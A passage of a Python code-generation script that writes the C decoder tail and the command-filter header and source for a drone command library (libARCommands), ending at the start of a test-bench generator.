DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n') cfile.write (' } // No else --> Do not modify retVal if no error occured\n') cfile.write (' }\n') cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) + ' */\n') cfile.write (' default:\n') cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) +'.UNKNOWN -> Unknown command", resString, stringLen, strOffset);\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n') cfile.write (' break;\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) + '.UNKNOWN -> Unknown command", resString, stringLen, strOffset);\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ' */\n') cfile.write (' default:\n') cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("UNKNOWN -> Unknown command", resString, stringLen, strOffset);\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n') cfile.write (' break;\n') cfile.write (' }\n') cfile.write (' } // No else --> Processing block\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('// END GENERATED CODE\n') cfile.close () ################################# # 9TH PART : # ################################# # Generate filter h file # ################################# hfile = open (paths.COMMANDSFIL_HFILE, 'w') hfile.write (LICENCE_HEADER) hfile.write ('/**\n') hfile.write (' * @file ' + COMMANDSFIL_HFILE_NAME + '\n') hfile.write (' * @brief libARCommands filter header.\n') hfile.write (' * This file contains all declarations needed to create and use a commands filter\n') hfile.write (' * @note Autogenerated file\n') hfile.write (' **/\n') hfile.write ('#ifndef ' + COMMANDSFIL_DEFINE + '\n') hfile.write ('#define ' + COMMANDSFIL_DEFINE + '\n') hfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n') hfile.write ('#include <inttypes.h>\n') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @brief Error code for ARCOMMANDS_Filter functions.\n') hfile.write (' */\n') hfile.write ('typedef enum {\n') hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ' = 0, ///< No error.\n') hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'ALLOC') + ', ///< Memory allocation error.\n') hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_STATUS') + ', ///< The given status is not a valid status.\n') hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_FILTER') + ', ///< The given filter is not a valid filter.\n') hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_BUFFER') + ', ///< The given buffer is not a valid buffer.\n') hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OTHER') + ', ///< Any other error.\n') hfile.write ('} ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ';\n') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @brief Status code for ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' function\n') hfile.write (' */\n') hfile.write ('typedef enum {\n') hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ' = 0, ///< The command should pass the filter\n') hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ', ///< The command should not pass the filter\n') hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'UNKNOWN') + ', ///< Unknown command. The command was possibly added in a newer version of libARCommands, or is an invalid command.\n') hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ERROR') + ', ///< The filtering of the command failed.\n') hfile.write ('} ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ';\n') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @brief ARCOMMANDS_Filter object holder\n') hfile.write (' */\n') hfile.write ('typedef struct ARCOMMANDS_Filter_t ARCOMMANDS_Filter_t;\n') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @brief Creates a new ARCOMMANDS_Filter_t\n') hfile.write (' * @param defaultBehavior The default behavior of the filter (must be either ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ' or ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ').\n') hfile.write (' * @param error Optionnal pointer which will hold the error code.\n') hfile.write (' * @warning This function allocates memory.\n') hfile.write (' * @note The memory must be freed by a call to ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + '.\n') hfile.write (' * @return A new ARCOMMANDS_Filter_t instance. NULL in case of error.\n') hfile.write (' */\n') hfile.write ('ARCOMMANDS_Filter_t* ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'NewFilter') + ' (' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' defaultBehavior, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' *error);\n') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @brief Deletes an ARCOMMANDS_Filter_t\n') hfile.write (' * @param filter The filter to delete.\n') hfile.write (' */\n') hfile.write ('void ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + ' (ARCOMMANDS_Filter_t **filter);\n') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @brief Filter an ARCommand\n') hfile.write (' * @param filter The ARCOMMANDS_Filter_t to use for filtering.\n') hfile.write (' * @param buffer The ARCommand buffer.\n') hfile.write (' * @param len The ARCommand buffer length.\n') hfile.write (' * @param error Optionnal pointer which will hold the error code.\n') hfile.write (' * @return An ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' status code\n') hfile.write (' */\n') hfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (ARCOMMANDS_Filter_t *filter, uint8_t *buffer, uint32_t len, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' *error);\n') hfile.write ('\n') hfile.write ('\n') hfile.write ('// Filter ON/OFF functions') hfile.write ('\n') for ftr in allFeatures: hfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @brief Sets the filter behavior for all commands ' + get_ftr_old_name(ftr) + '.XXX.XXX.\n') hfile.write (' * @param filter The filter to be modified.\n') hfile.write (' * @param behavior The behavior to use for the commands (must be either ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ' or ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ').\n') hfile.write (' * @return An ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' enum.\n') hfile.write (' */\n') hfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior);\n') hfile.write ('\n') if ftr.classes: #project only for cl in ftr.classes: hfile.write ('// Command class ' + cl.name + '\n') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @brief Sets the filter behavior for all commands ' + get_ftr_old_name(ftr) + '.' + cl.name + '.XXX.\n') hfile.write (' * @param filter The filter to be modified.\n') hfile.write (' * @param behavior The behavior to use for the commands (must be either ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ' or ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ').\n') hfile.write (' * @return An ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' enum.\n') hfile.write (' */\n') hfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior);\n') hfile.write ('\n') for cmd in cl.cmds: hfile.write ('/**\n') hfile.write (' * @brief Sets the filter behavior for the command ' + get_ftr_old_name(ftr) + '.' + cl.name + '.' + cmd.name + '.\n') hfile.write (' * @param filter The filter to be modified.\n') hfile.write (' * @param behavior The behavior to use for the command (must be either ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ' or ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ').\n') hfile.write (' * @return An ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' enum.\n') hfile.write (' */\n') hfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior);\n') hfile.write ('\n') hfile.write ('\n') else: for cmd in ftr.cmds + ftr.evts: hfile.write ('/**\n') hfile.write (' * @brief Sets the filter behavior for the command ' + get_ftr_old_name(ftr) + '.' + cmd.name + '.\n') hfile.write (' * @param filter The filter to be modified.\n') hfile.write (' * @param behavior The behavior to use for the command (must be either ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ' or ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ').\n') hfile.write (' * @return An ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' enum.\n') hfile.write (' */\n') hfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior);\n') hfile.write ('\n') hfile.write ('\n') hfile.write ('\n') hfile.write ('#endif /* ' + COMMANDSFIL_DEFINE + ' */\n') hfile.close () ################################# # 10TH PART : # ################################# # Generate filter c file # ################################# cfile = open (paths.COMMANDSFIL_CFILE, 'w') cfile.write (LICENCE_HEADER) cfile.write ('/********************************************\n') cfile.write (' * AUTOGENERATED FILE *\n') cfile.write (' * DO NOT MODIFY IT *\n') cfile.write (' * *\n') cfile.write (' * To add new commands : *\n') cfile.write (' * - Modify ../Xml/commands.xml file *\n') cfile.write (' * - Re-run generateCommandsList.py script *\n') cfile.write (' * *\n') cfile.write (' ********************************************/\n') cfile.write ('#include <config.h>\n') cfile.write ('#include <stdlib.h>\n') cfile.write ('#include "' + COMMANDSRW_HFILE_NAME + '"\n') cfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n') cfile.write ('#include <' + COMMANDSFIL_HFILE_NAME + '>\n') cfile.write ('#include <' + COMMANDSID_HFILE_NAME + '>\n') cfile.write ('\n') cfile.write ('\n') cfile.write ('// ARCOMMANDS_Filter_t structure definition\n') cfile.write ('struct ARCOMMANDS_Filter_t\n') cfile.write ('{\n') for ftr in allFeatures: cfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n') for cmd in ftr.cmds + ftr.evts: cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior;\n') cfile.write ('\n') cfile.write ('};\n') cfile.write ('\n') cfile.write ('\n') cfile.write ('// Constructor\n') cfile.write ('ARCOMMANDS_Filter_t* ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'NewFilter') + ' (' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' defaultBehavior, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' *error)\n') cfile.write ('{\n') cfile.write (' ARCOMMANDS_Filter_t *retFilter = NULL;\n') cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n') cfile.write (' if ((defaultBehavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') &&\n') cfile.write (' (defaultBehavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + '))\n') cfile.write (' {\n') cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_STATUS') + ';\n') cfile.write (' } // No else : Args check\n') cfile.write ('\n') cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' retFilter = malloc (sizeof (struct ARCOMMANDS_Filter_t));\n') cfile.write (' if (retFilter == NULL)\n') cfile.write (' {\n') cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'ALLOC') + ';\n') cfile.write (' } // No else : Error processing.\n') cfile.write (' } // No else : Processing block\n') cfile.write ('\n') cfile.write (' // Setup default behavior\n') cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n') cfile.write (' {\n') for ftr in allFeatures: cfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n') for cmd in ftr.cmds + ftr.evts: cfile.write (' retFilter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior = defaultBehavior;\n') cfile.write (' } // No else : Processing block\n') cfile.write ('\n') cfile.write (' if (error != NULL)\n') cfile.write (' {\n') cfile.write (' *error = localError;\n') cfile.write (' } // No else : Set error only if pointer is not NULL\n') cfile.write (' return retFilter;\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('void ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + ' (ARCOMMANDS_Filter_t **filter)\n') cfile.write ('{\n') cfile.write (' if ((filter != NULL) &&\n') cfile.write (' (*filter != NULL))\n') cfile.write (' {\n') cfile.write (' free (*filter);\n') cfile.write (' *filter = NULL;\n') cfile.write (' } // No else : No need to delete an invalid filter instance\n') cfile.write ('}\n') cfile.write ('\n') cfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (ARCOMMANDS_Filter_t *filter, uint8_t *buffer, uint32_t len, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' *error)\n') cfile.write ('{\n') cfile.write (' ' + AREnumName (LIB_MODULE, ID_SUBMODULE, 'FEATURE') + ' commandFeature = -1;\n') cfile.write (' int commandClass = -1;\n') cfile.write (' int commandId = -1;\n') cfile.write (' int32_t offset = 0;\n') cfile.write (' int32_t readError = 0;\n') cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n') cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' retStatus = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'UNKNOWN') + ';\n') cfile.write ('\n') cfile.write (' // Args check\n') cfile.write (' if (filter == NULL)\n') cfile.write (' {\n') cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_FILTER') + ';\n') cfile.write (' } // No else : Args check\n') cfile.write ('\n') cfile.write (' if ((buffer == NULL) ||\n') cfile.write (' (len < 4))\n') cfile.write (' {\n') cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_BUFFER') + ';\n') cfile.write (' } // No else : Args check\n') cfile.write ('\n') cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' commandFeature = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, len, &offset, &readError);\n') cfile.write (' if (readError == 1)\n') cfile.write (' {\n') cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_BUFFER') + ';\n') cfile.write (' }\n') cfile.write (' } // No else : Processing block\n') cfile.write ('\n') cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' commandClass = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, len, &offset, &readError);\n') cfile.write (' if (readError == 1)\n') cfile.write (' {\n') cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_BUFFER') + ';\n') cfile.write (' }\n') cfile.write (' } // No else : Processing block\n') cfile.write ('\n') cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' commandId = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, len, &offset, &readError);\n') cfile.write (' if (readError == 1)\n') cfile.write (' {\n') cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_BUFFER') + ';\n') cfile.write (' }\n') cfile.write (' } // No else : Processing block\n') cfile.write ('\n') cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' switch (commandFeature)\n') cfile.write (' {\n') for ftr in allFeatures: cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ':\n') cfile.write (' {\n') if ftr.classes: cfile.write (' switch (commandClass)\n') cfile.write (' {\n') for cl in ftr.classes: cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ':\n') cfile.write (' {\n') cfile.write (' switch (commandId)\n') cfile.write (' {\n') for cmd in cl.cmds: cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ':\n') cfile.write (' {\n') cfile.write (' retStatus = filter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Behavior;\n') cfile.write (' }\n') cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ' */\n') cfile.write (' default:\n') cfile.write (' // Do nothing, the default answer is already UNKNOWN\n') cfile.write (' break;\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ' */\n') cfile.write (' default:\n') cfile.write (' // Do nothing, the default answer is already UNKNOWN\n') cfile.write (' break;\n') cfile.write (' }\n') else: cfile.write (' if (commandClass == '+ARMacroName (LIB_MODULE, ID_SUBMODULE, 'FEATURE_CLASS')+')\n') cfile.write (' {\n') cfile.write (' switch (commandId)\n') cfile.write (' {\n') for cmd in ftr.cmds + ftr.evts: cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) + ':\n') cfile.write (' {\n') cfile.write (' retStatus = filter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Behavior;\n') cfile.write (' }\n') cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) + ' */\n') cfile.write (' default:\n') cfile.write (' // Do nothing, the default answer is already UNKNOWN\n') cfile.write (' break;\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write (' //Else Do nothing, the default answer is already UNKNOWN\n') cfile.write (' }\n') cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ' */\n') cfile.write (' default:\n') cfile.write (' // Do nothing, the default answer is already UNKNOWN\n') cfile.write (' break;\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write ('\n') cfile.write (' if (localError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' retStatus = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ERROR') + ';\n') cfile.write (' } // No else : Keep retStatus if no error occured\n') cfile.write ('\n') cfile.write (' if (error != NULL)\n') cfile.write (' {\n') cfile.write (' *error = localError;\n') cfile.write (' } // No else : Set error only if pointer is not NULL\n') cfile.write ('\n') cfile.write (' return retStatus;\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('\n') cfile.write ('// Filter ON/OFF functions') cfile.write ('\n') for ftr in allFeatures: cfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n') cfile.write ('\n') cfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior)\n') cfile.write ('{\n') cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n') cfile.write ('\n') cfile.write (' if (filter == NULL)\n') cfile.write (' {\n') cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_FILTER') + ';\n') cfile.write (' } // No else : Args check\n') cfile.write ('\n') cfile.write (' if ((behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') &&\n') cfile.write (' (behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + '))\n') cfile.write (' {\n') cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_STATUS') + ';\n') cfile.write (' } // No else : Arg check\n') cfile.write ('\n') cfile.write (' if (retError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n') cfile.write (' {\n') for cmd in ftr.cmds + ftr.evts: cfile.write (' filter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior = behavior;\n') cfile.write (' }\n') cfile.write ('\n') cfile.write (' return retError;\n') cfile.write ('}\n') cfile.write ('\n') if ftr.classes:#project only for cl in ftr.classes: cfile.write ('// Command class ' + cl.name + '\n') cfile.write ('\n') cfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior)\n') cfile.write ('{\n') cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n') cfile.write ('\n') cfile.write (' if (filter == NULL)\n') cfile.write (' {\n') cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_FILTER') + ';\n') cfile.write (' } // No else : Args check\n') cfile.write ('\n') cfile.write (' if ((behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') &&\n') cfile.write (' (behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + '))\n') cfile.write (' {\n') cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_STATUS') + ';\n') cfile.write (' } // No else : Arg check\n') cfile.write ('\n') cfile.write (' if (retError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n') cfile.write (' {\n') for cmd in cl.cmds: cfile.write (' filter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Behavior = behavior;\n') cfile.write (' }\n') cfile.write ('\n') cfile.write (' return retError;\n') cfile.write ('}\n') cfile.write ('\n') for cmd in ftr.cmds + ftr.evts: cfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior)\n') cfile.write ('{\n') cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n') cfile.write (' if (filter == NULL)\n') cfile.write (' {\n') cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_FILTER') + ';\n') cfile.write (' } // No else : Args check\n') cfile.write ('\n') cfile.write (' if ((behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') &&\n') cfile.write (' (behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + '))\n') cfile.write (' {\n') cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_STATUS') + ';\n') cfile.write (' } // No else : Arg check\n') cfile.write ('\n') cfile.write (' if (retError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' filter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior = behavior;\n') cfile.write (' }\n') cfile.write ('\n') cfile.write (' return retError;\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('\n') cfile.write ('// END GENERATED CODE\n') cfile.close () def tb_generateCmds(ctx, paths): genDebug = True genTreeFilename = None projects = [DEFAULTPROJECTNAME] if not os.path.exists (paths.TB__DIR): os.makedirs (paths.TB__DIR) if not os.path.exists (paths.LIN_TB_DIR): os.makedirs (paths.LIN_TB_DIR) if not os.path.exists (paths.COM_TB_DIR): os.makedirs (paths.COM_TB_DIR) allFeatures = ctx.features # Check types used for ftr in allFeatures: for msg in ftr.getMsgs(): for arg in msg.args: if isinstance(arg.argType, ArEnum): 